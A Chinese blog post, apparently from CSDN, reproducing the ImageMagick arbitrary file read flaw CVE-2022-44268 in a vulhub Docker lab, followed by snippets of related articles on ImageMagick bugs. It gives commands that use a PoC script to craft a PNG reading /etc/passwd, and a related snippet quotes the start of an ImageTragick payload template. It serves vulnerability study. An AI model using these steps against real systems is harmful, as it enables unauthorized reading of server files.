ImageMagick任意文件读取漏洞(CVE-2022-44268)vulhub漏洞复现

最新推荐文章于 2024-06-29 08:00:00 发布
最新推荐文章于 2024-06-29 08:00:00 发布
阅读量607 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/132019236
版权
ImageMagick的7.1.0-51及以前版本存在一个安全漏洞,允许在处理PNG文件时读取系统上的任意文件内容。攻击者可以通过上传特制图片触发该漏洞,例如读取/etc/passwd。复现过程包括安装pypng,生成恶意图片,上传并利用poc.py解析来证明漏洞的存在。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ImageMagick任意文件读取漏洞(CVE-2022-44268)

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。在ImageMagick 7.1.0-51版本及以前,其处理PNG文件的代码中存在一处功能,会导致转换图片时读取到当前操作系统上的任意文件,并将文件内容输出在图片内容中。

漏洞复现

cd vulhub-master/

cd imagemagick/

cd CVE-2022-44268/

docker-compose up -d

访问ip:8080 有一个文件上传的页面,功能是将用户上传的任意图片缩小成50x50的PNG图片。

在这里插入图片描述

攻击准备

1.安装pypng

pip install pypng

2.执行poc生成恶意图片

vulhub/imagemagick/CVE-2022-44268/poc.py at master · vulhub/vulhub (github.com)

./poc.py generate -o poc.png -r /etc/passwd

在这里插入图片描述

3.上传生成的图片

在这里插入图片描述
将your image的图片下载下来

在这里插入图片描述

4.使用poc.py读取下载的图片

./poc.py parse -i 64c72b09b2763.png

在这里插入图片描述

5./etc/passwd读取成功

ImageMagick任意文件读取(CVE-2022-44268)
qq_32445755的博客
03-23 648
ImageMagick是一个免费的创建、编辑、合成图片的软件。它可以读取、转换、写入多种格式的图片。ImageMagick的大多数功能的使用都来源于命令行工具。当 ImageMagick 解析 PNG 文件时,例如在调整大小操作中,生成的图像可能嵌入了来自网站的任意远程文件的内容(如果 magick 二进制文件有权读取它)。恶意行为者可以制作 PNG 或使用现有 PNG 并添加文本块类型(例如 tEXt)。这些类型具有关键字和文本字符串。
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 1333
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
ImageMagick任意文件读取漏洞(CVE-2022-44268)
god_Zeo的安全博客
02-12 4552
爆出一个 ImageMagick 漏洞 CVE-2022-44268 ,在ImageMagick 7.1.0-51版本及以前 ,可以造成一个任意文件读取的危害比较可观,最近有时间来复现学习一下
漏洞复现CVE-2022-44268 ImageMagick任意文件读取漏洞
m0_53121608的博客
07-13 414
漏洞复现CVE-2022-44268 ImageMagick任意文件读取漏洞
漏洞复现ImageMagick命令注入漏洞(CVE-2016–3714/15/16/17/18)
m0_52923241的博客
04-03 1618
ImageMagic是一款图片处理工具,当传入一个恶意图片时,就有可能存在命令注入漏洞ImageMagick默认支持一种图片格式mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。影响ImageMagick 6.9.3-9以前的所有版本。
ImageMagick命令注入漏洞(CVE-2016–3714)复现笔记
u011975363的专栏
06-18 2792
学习资料 https://www.cnblogs.com/bmjoker/p/9898590.html https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html 漏洞原理 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 国外的安全人员为此新建了一个网站:
ImageMagick命令注入漏洞(CVE-2016–3714)
最新发布
qq_68163788的博客
06-29 963
ImageMagick命令注入漏洞(CVE-2016-3714)是一种安全漏洞,它影响了广泛使用的图像处理软件ImageMagick。该漏洞允许恶意用户通过操纵图像文件中嵌入的特定代码,来执行任意命令和从外部网络资源加载图片。这可能导致恶意用户在受影响的服务器上执行任意命令,引发各种潜在的安全风险。 对于系统管理员和开发人员来说,修复这种漏洞的最佳方法是升级到已经修复了这个问题的ImageMagick版本,并定期更新系统来防止类似漏洞的出现。此外,也可以禁用一些ImageMagick的功能
Gitlab 任意文件读取漏洞CVE-2016-9086)和漏洞CVE-2018-19475)
m0_53603468的博客
12-25 874
文章目录一、概述**任意文件读取漏洞**二、漏洞复现 一、概述 Gitlab 任意文件读取漏洞CVE-2016-9086) 影响版本Gitlab版本:8.13.1之前 GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。使用Git作为代码管理工具,并在此基础上搭建起来的web服务。 GitLab由乌克兰程序员DmitriyZaporozhets和ValerySizov开发,它使用Ruby语言写成。后来,一些部分用Go语言重写。截止
[CVE-2016–3714]-Imagetragick 命令执行漏洞复现
https://www.cnblogs.com/zpchcbd/
08-13 791
路径:/root/vulhub/imagemagick/imagetragick 搭建:docker-compose up -d 打开地址:存在三个文件demo.php upload.php vul.jpg vul.jpg是攻击的模板 push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg...
Juniper Product
09-12
Juniper Product
oracle死锁
06-03
oracle死锁解决办法。可查看死锁语句、表、用户,包含解决办法。
Imagemagick PDF密码位置命令注入漏洞CVE-2020-29599)复现
玄道的网安博客
04-07 1233
漏洞概述 ImageMagick是一款使用量很广的图片处理程序,ImageMagick之前6.9.11-40和7。在7.0.10-40之前的x错误地处理了-authenticate选项,该选项允许为密码保护的PDF文件设置密码。用户控制的密码没有被正确转义,因此可以通过构造好的SVG格式图片文件,即可在Imagemagick中注入任意命令。 环境搭建 https://github.com/vulhub/vulhub/tree/master/imagemagick/CVE-2020-...
vulhub漏洞复现27_Imagemagick
weixin_44193247的博客
02-02 1153
vulhub漏洞复现练习篇
ImageMagick命令执行漏洞
weixin_33963594的博客
05-06 188
这两天刚爆的ImageMagick命令执行漏洞比较火。 影响版本范围 ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)低版本至6.9.3-9 released 2016-04-30 漏洞分析:http://bobao.360....
ImageMagick漏洞演示
hello_simon的专栏
05-05 2582
centos安装 wgethttp://downloads.jmagick.org/6.4.0/ImageMagick-6.4.0-0.tar.gz tar zvxf ImageMagick-6.4.0-0.tar.gz cd ImageMagick-6.4.0-0 ./configure --prefix=/usr/locate/ImageMagick-6.4.0 --with
复现cve-2022-44268
jjjj1029056414的博客
07-15 316
复现cve-2022-44268ImageMagick任意文件读取漏洞
热门开源软件ImageMagick中出现多个新漏洞
smellycat000的专栏
02-02 1665
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员详述了开源软件 ImageMagick 中的两个漏洞详情,它们可导致拒绝服务和信息泄露后果。这两个漏洞是由拉美网络安全公司 etabase Q 在7.1.0-49版本中发现的,已在2022年11月发布的ImageMagick 7.1.0-52中修复。这两个漏洞CVE-2022-44267和CVE-2022-44268:前者是一个D...
ImageMagick漏洞汇总
Au
04-05 4666
ImageMagick 一款使用量很广的图片处理程序,许多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等功能 本文就简单的做个汇总,细节就概述了 CVE-2016-3714— RCE ImageMagick流行的原因之一,就是它功能强大,可以处理很多情况,而有一个功能delegate,作用是调用外部的lib来处理文件。调用外部lib就是执行system命令,...
CVE-2022-44268
09-01
CVE-2022-44268ImageMagick的一个漏洞,该漏洞可导致任意文件读取。根据提供的引用内容,可以找到相关的POC和代码示例来演示该漏洞的利用。由于该漏洞具有潜在的危害性,建议及时更新和修补受影响的ImageMagick版本以避免可能的攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-44268-POC.py](https://download.csdn.net/download/qq_51577576/87559843)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ImageMagick任意文件读取漏洞(CVE-2022-44268)](https://blog.csdn.net/god_zzZ/article/details/128997219)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [ImageMagick任意文件读取漏洞CVE-2022-44268vulhub漏洞复现](https://blog.csdn.net/qq_53003652/article/details/132019236)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值